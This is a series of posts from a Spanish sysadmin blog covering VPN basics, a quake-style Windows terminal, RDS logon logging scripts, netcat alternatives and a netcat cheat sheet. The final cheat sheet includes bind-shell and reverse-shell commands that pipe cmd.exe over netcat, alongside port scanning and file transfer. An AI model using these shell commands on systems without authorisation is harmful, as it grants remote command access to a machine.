Ultimo post en este blog

Buenas a todos, si queréis leerme actualizad vuestros enlances. Mi nuevo blog lo encontraréis en htttp://www.aprendizdesysadmin.com

VPN – explicación para DUMMIES

Hola a todos,

Las VPN (Virtual Private Network) o Red Privada Virtual, ha dia de hoy no es algo oscuro y raro, hay extensa documentación repartida por todo internet, desde lo que és, hasta como montarla con diferentes sistemas operativos y hardware de distintos proveedores. Mi intención con el siguiente post, no es repetir (aunque tal vez ya exista un post por internet que no haya visto) lo que aparece en todos lados, sino intentar explicarlo de forma somera, mundana y para DUMMIES.

Bueno aquí vamos:

¿Que es una VPN?

Una VPN, sirve como objetivo principal para comunicar 2 o más ubicaciones (redes) y que puedan trabajar como si estuviesen “virtualmente” en la misma ubicación, pudiendo así, compartir y acceder a los recursos de las ubicaciones.

Vale, pero ¿como funciona?

Bueno, simplificandolo mucho, una VPN establece un “tunel virtual” entre la red origen y la red destino. Es igual lo que haya por medio, veamos algunos ejemplos de uso con los que tal vez quede más claro:

RED1 — INTERNET — RED2   —> Aqui se establecería un “tunel virtual” que iría desde la red1 hasta la red2 cruzando internet, y permitiendo a la red1 acceder de forma “segura” a los recursos de la red2 y viceversa.

2310740014_1f184f74c4

Photo Credit: DesktopSupport via Compfight cc

USUARIO REMOTO — INTERNET — RED_EMPRESA —> Este es otro ejemplo de uso, el caso sería igual que el anterior, pero difiere en que  es un usuario en concreto el que se podría conectar desde “cualquier parte del mundo” a la red de su empresa y acceder a los recursos de la misma,  cruzando internet a través del “tunel virtual”.

RED1 — RED2 — RED3 –> Este es otro escenario, en el que dentro de una empresa con 3 redes distintas, necesitamos que de alguna forma la RED1 acceda a los recursos de la RED3, cruzando la RED2. Y que la Red2 no tenga acceso a la RED1 ni a la RED3, evidentemente hay otras formas de realizar esto, pero es otra posiblidad.

2310739922_3f68958652
Photo Credit: DesktopSupport via Compfight cc

¿Es segura una VPN?

Ha día de hoy, hay que decir que depende de la implementación que se utilice, escenario, y demás… pero si se toman las medidas oportunas y se planifica correctamente, una VPN es “bastante segura”, hay varias protocolos a elegir para implementar VPN’s como pueden ser IPSEC, L2TP, PPTP, etc.

¿A quien puede servir montar una VPN?

A todo el mundo, ya que una VPN es barata dependiendo de lo que quieras realizar, muchos routers ya tienen la opción de crear VPN, y para usuarios remotos con tener un cliente VPN (Muchos Sistemas Operativos, ya lo traen por defecto instalado) ya está.

Tambien se puede montar por software, o sea que el que haga de servidor o servidores sea un software tipo OpenVPN o el RRAS de MS. Vamos que la infraestructura para montarlo esta al alcance de todo el mundo. Y proporciona seguridad, anonimato, y acceso a nuestras infraestructuras desde cualquier lugar.

Además, hay clientes VPN para dispositivos móviles, android, iphone, etc.

¿que más quereis?

Espero que este post os haya gustado.

Terminal en windows tipo quake (en linux yakuake o tilda)

Hola amigos,

Siempre me ha gustado personalizar mi windows a mi gusto y necesidades, siempre he envidiado el no tener una consola tipo yakuake o tilda en mi windows, pero curiosamente, casi sin querer he encontrado una que si lo hace.

Hasta ahora siempre he estado utilzando como reemplazo del cmd a console2 y como explorador de archivos al clon de norton commander, mi querido farmanager.

Pues he econtrado a un acompañante de lo mas chulo, conemu , un emulador de consola con Tabs, transparencias, personalizables y con una opción la mar de chula “quakestyle”. Os podéis descargar el conemu desde el enlace anterior y unaa vez instalado, lo ejecutais y con el boton derecho sacáis las “settings” os dirigiis a “Size&Pos” y marcáis “Quake style slide down” y “Auto-hide on focus lose”.

settingsConEmu

Una vez realizado esto, os aconsejo echarle un vistazo a la cantidad de personalizaciones que se pueden realizar. Ahora ejecutamos conemu y con CTRL+ñ nos aparecera así.

Conemu-deslizando

Si pulsamos ctrl+ñ de nuevo se ocultará, además podemos configurar transparencias, colores, etc. Vamos un complemento perfecto para todo aquel que trabaja con la consola de windows. Por cierto, tambien se puede configurar para que arranque powershell, cygwin…

Espero que os haya gustado este minipost. Felices fiestas a todos.

“Amigos de twitter” a tener muy en cuenta

Hola a todos, en estas fechas siempre me pongo mu sentimental, y para variar un poco, me gustaria dar las gracias por soportarme a una serie de “PROFESIONALES” que me han aguantado mucho, tanto en twitter como por skype y de los que he adquirido gran cantidad de conocimientos que seguramente no podría haber adquirido por mi mismo, además de establer con algunos de ellos un amistad muy sana :). Son GRANDES PROFESIONALES y mucho mejor PERSONAS, HACKERS como ellos solos en todos los sentidos, y grandes contribuyentes con la comunidad.

Os recomiendo a todos seguirles ya que sin duda alguna vais a aprender mucho de ellos.

Aqui va la lista, os pongo sus nicks en tweeter para que les podáis encontrar.

@seguridadyredes –> increible gaditano, salao como el solo, al que tengo gran estima, un “pro” como una catedral y una mejor persona, si te gustan las redes, analisis de protocolos, IDS, etc. Para mi una gran referencia.

@daboblog –> Un Hacker, debianita y hombre de GRAN PACIENCIA “ya sabes que me gusta dar guerra”, un “pro” muy indio en APACHECTL  muy recomendable seguirle si te gusta y/o te dedicas a GNU/LinuxSysadmin, PENTEST, seguridad, etc. Por cierto junto con OTROS profesionales como @oreixa, @foratinfo, @n1mh, etc. hacen el podcast “KERNEL PANIC” y “Manzanas Traigo” (muy recomendable)

@foratinfo –> Linuxero de pura cepa, un RADIAL NINJA, gran pro y gran persona tambien.

@oreixa –> Otro PRO de apacheCTL, MAQUERO como el solo :) y un gran Sysadmin, aunque no este muy deacuerdo con el en algunas cosas, otro gran tipo.

@Israelmgo –> Otro amigo y Sysadmin, otra gran persona de la que he aprendido mucho.

@voylinux –> Este amigo es reciente, me debe muchos cafes, Linuxero. Tambien a sido adoptado por Mallorca :-).

Muchas gracias a todos por compartir vuestro tiempo, conocimientos, amistad y por SOPORTARME. Os deseo lo mejor a todos.

Un gran abrazo a todos.

RDS: Logear cuando un usuario realiza logon y logoff.

hola a todos,

El post de hoy viene dado por una consulta que me realizaron hace un par de dias un compañero/colaborador en la que me exponia su problema:

Tengo un cliente que quiere saber cuando se han conectado los usuarios y el tiempo que han estado conectados a su RDS (Remote Desktop Services) el servidor es un windows 2008 R2…

YO: Bueno, basta con mirar en el visor de sucesos los sucesos referentes al inicio de sesión y de logout, le dije yo….

COMPI: Ya pero es mucho trabajo, echame una mano para automatizar esto…

YO: Bueno, puedes probar con logparser…. con el que puedes realizar consultas tipo sql al fichero en cuestión y…..

COMPI: ufffff, Paco eso es muy complicado recuerda que no me llevo bien ni con programación y con sentencias sql….

YO: Pero vamos a ver nen, en que mundo vives, ES NECESARIO como MINIMO, saber algo de scripting, al menos lo suficiente como para entender “algo” de lo que copias y pegas por internet….. y que quieres que haga yo entonces…. veamos ¿QUE QUIERES CONTROLAR EXACTAMENTE?…..

COMPI: Mira, me bastaría con saber cuando un USUARIO, se ha conectado al RDS (nota para los que no lo sepan, EL RDS es el antiguo TERMINAL SERVICES) o se ha desconectado, a que hora lo ha realizado, y ya me buscaré yo la vida con mi libreoffice para calcular cuantas veces, y cuanto tiempo a estado cada usuario conectado.

YO: Jod… pues vamos bien al final los marroncitos para mi, pero bueno dejame pensarlo y te digo cosas….

Bueno, tras unos minutos de pensarlo, decidi que lo más FACIL seria que cuando un usuario se loguease o hiciese un logout se guardase en un fichero de texto los datos de fecha, hora, y usuario  de esa forma luego el COMPI podría importar dichos datos y jugar con su hojita de libreoffice para realizar los calculos.

Bueno 5 minutos más tarde ya tenia los scripts preparados y este fue el resultado.

— logon.vbs

' Creo objeto FilesystemObject
Set ObjFSO = CreateObject("scripting.Filesystemobject")
'Defino el fichero logs.txt, el parámetro 8 significa Append.
Set objLogFile = ObjFSO.OpenTextFile ("c:\scripts\logs.txt",8,true)
'Creo el objeto Network del que luego podré extraer el usuario
Set objNetwork = Wscript.CreateObject("WScript.Network")
strUsuario = objNetwork.Username
 objLogFile.writeline  strUsuario & " Conectado "  & Now
objLogFile.close

Como se puede ver el resto del script no comentado no guarda mucho misterio. :-) Vamos a por el logoff.vbs

--- logoff.vbs
Set ObjFSO = CreateObject("scripting.Filesystemobject")
Set objLogFile = ObjFSO.OpenTextFile ("c:\scripts\logs.txt",8,true)
 Set objNetwork = Wscript.CreateObject("WScript.Network")
strUsuario = objNetwork.Username
 objLogFile.writeline  strUsuario & " Desconectado " & Now
objLogFile.close

Como véis son prácticamente iguales, simplemente cambia que uno aparece Conectado y en el otro aparece desconectado, ahora simplemente le asigno en gpedit.msc que se ejecuten el primero cuando hagan logon y el segundo cuando hagan logoff.

El resultado del fichero quedaría así:

Administrador Conectado 10/07/2012 6:23:24 
Administrador Desconectado 10/07/2012 6:28:12

Fin de la historia, a partir de aqui mi COMPI, puede coger el fichero log y hacer con el lo que le plazca.

Como podéis ver, a veces la soluciones a problemas con 6 lineas de codigo resuelves un “PROBLEMON DE LA MUERTE”…. :-)

Y ahora un consejo para todos los SYSADMIN.

Para cualquier cosa que se tenga que realizar o resolver, hay muchas formas de hacerlo  algunas elegantes, otras no tanto, con software de terceros, etc. El scripting, da igual si es perl, powershell, vbs, batch, phyton, … lo que sea… es una herramienta que todo sysadmin debería tener en cuenta a la hora de buscar una solución a problemas o para la automatización de tareas, nuestro tiempo es limitado y utilizar scripting nos permite “vivir” un poco menos estresados.

Como siempre espero que este post os sirva de algo…. :)

Alternativas al netcat

El otro día en twitter tuve un pequeño lapsus sobre las alternativas a netcat, esta mañana me ha venido a la memoria que el socat no es parte del proyecto nmap, por lo tanto, he vuelto a mirar las opciones y aqui esta el resultado correcto:

cryptcat [http://cryptcat.sourceforge.net/] .-  Es una implementación de netcat que permite encriptación twofish, esta disponible para windows nt, BSD y linux.

socat [http://www.dest-unreach.org/socat/].- Tal y como dicen en su web es un netcat ++ permite multiples conexiones, redirección de puetos y mucho mas…. disponible para AIX, BSD, HP-UX, Linux, Solaris e.a. (UNIX).

ncat [http://nmap.org/ncat/].- Este SI pertenece al proyecto nmap, ha sido reimplementado por el equipo de nmap, tiene soporte para SSL,  conexiones a traves de proxy SOCKS4, esta disponible para LINUX, MAC Y WINDOWS. Y viene por defecto en el mismo paquete que el nmap. Es una herramienta un poco desconocida  pero  muy util, lástima que muchos no comprobemos lo que se instala cuando montamos algo en nuestros equipos.

Bueno espero que está mini explicación aclare un poco más el tema.

saludos a todos,

Mini Chuleta de netcat

Hola a todos, hoy en twitter @SeguInfo hacia referencia a una gran herramienta que ha sido considerada como la navaja suiza del tcp/ip, bueno tras ver la notica y aunque se han escrito hasta libros referente a ella, os adjunto un mini-chuletario que realize en su día del uso de la misma, aqui viene.

Escanear puertos:
nc -vvw 2 ip_destino puerto/s
Ejemplo: c:\>nc -vvw 2 localhost 1-1024

    Para guardar el resultado en un fichero.
nc -vvw 2 localhost 1-200 >nom_fichero 2>&1

Montar un miniservidor web
nc -lp 100 nom_fichero

Ejemplo:
El equipo origen tiene la ip 192.168.0.1
El equipo destino tiene la ip 192.168.0.2

Origen:
type hola.zip | nc -lp 900 192.168.0.2
Destino:
nc 192.168.0.1 900 >fichero.zip

Crear un Talkd, para conversación ip en plan irc.
El que crea la conversación (Servidor)
nc -lvvp puerto    ejemplo: nc -lvvp 1234

El que se conecta (cliente)
nc -tvv puerto     ejemplo: nc -tvv 1234

Para crear conexiones telnet

Para hacer de Servidor:
nc -tlp puerto -e cmd.exe

El cliente:
nc -t ip puerto

Para que el equipo remoto me envie una consola:
Destino:
nc -lp 5000 -nvv
Origen:
nc -e cmd.exe -n ip puerto
nc -e cmd.exe -n 127.0.0.1 5000

Para dejar escuchando el equipo en un puerto y cancelar si el equipo no tiene una ip determinada.
nc -lp 999 192.168.0.2
Nota: si yo hago un nc – t ip_destino y mi ip no es la 192.168.0.2 el nc se cancela.

Para hacer de cliente telnet
nc -tvv ip puerto

Para transferir ficheros
Origen:
type nom_fichero | nc -lp 900

Destino:
nc ip puerto > nom_fichero

Ejemplo:
El equipo origen tiene la ip 192.168.0.1
El equipo destino tiene la ip 192.168.0.2

Origen:
type hola.zip | nc -lp 900 192.168.0.2
Destino:
nc 192.168.0.1 900 >fichero.zip

Con el netcat6 de linux permite cortar la comunicación del fichero con la opción -q 0.
cat fich | nc6 -lp 900 -q 0

Si ya se que es repetir lo mismo una y otra vez, pero por si hay algún despistado por hay aqui tiene algo con lo que probar……

Nada como siempre espero que sea de ayuda…. saludos a todos,

Seguir

Recibe cada nueva publicación en tu buzón de correo electrónico.